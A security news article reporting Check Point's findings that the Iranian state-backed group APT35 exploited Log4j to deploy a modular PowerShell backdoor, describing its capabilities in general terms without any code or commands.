Beware! Threat Actors Using Log4j to Install New Backdoor

It seems like Log4j is not going anywhere in 2022, much like the novel coronavirus. The cat is out of the bag and it's running wild, with no signs of stopping. A recent analysis by security firm Check Point shows that a state-backed threat actor known under the handle APT35 is now using Log4j to distribute a brand-new malicious toolkit that uses PowerShell.

The same threat actor has been named Phosphorous by Microsoft's security researchers. The hackers are considered to be a state-backed Iranian group. Last week Microsoft warned about multiple state-backed threat actors already doing large-scale probing, seeking networks that still have exposed Log4j vulnerable systems.

APT35 Uses Known Tools

The research Check Point did on the latest APT35 case shows that the hackers weren't particularly good at their job. The research paper calls their initial attack vector "rushed", using a basic open-sourced tool, formerly available on GitHub, before it's takedown.

Once APT35 gains access, the group installs a modular backdoor based on PowerShell in order to achieve persistence on the compromised network. The same PowerShell tool is used to communicate with the C2 servers and download extra malicious modules and run commands.

Modular Backdoor Used by APT35

The PowerShell module scrapes information about the compromised system, then sends it back to the control server. Based on the response it gets, the server may decide to further the attack, executing additional modules in C# or PowerShell. Those extra modules perform various tasks, such as exfiltrating information or encrypting existing data on the network.

The functionality doesn't stop here. Some modules allow for grabbing screenshots, some monitor active background processes, and finally, one that cleans any trace left by the scanning, and the other modules, killing their processes.

Despite this seemingly rich functionality of the toolkit deployed beyond the initial attack, researchers did not think too highly of APT35. The reason for this was that the hacker group used previously known public tools that made detection easy and relied on an already existing C2 server infrastructure that further makes things easier for security monitoring and rings alarm bells.

It is fairly certain that we will hear about many newer and increasingly more creative attacks abusing Log4j vulnerabilities in one way or another throughout 2022. Hopefully, companies and software and platform developers will work hand in hand and quickly, to at least stay on the pace and don't lag behind the hackers.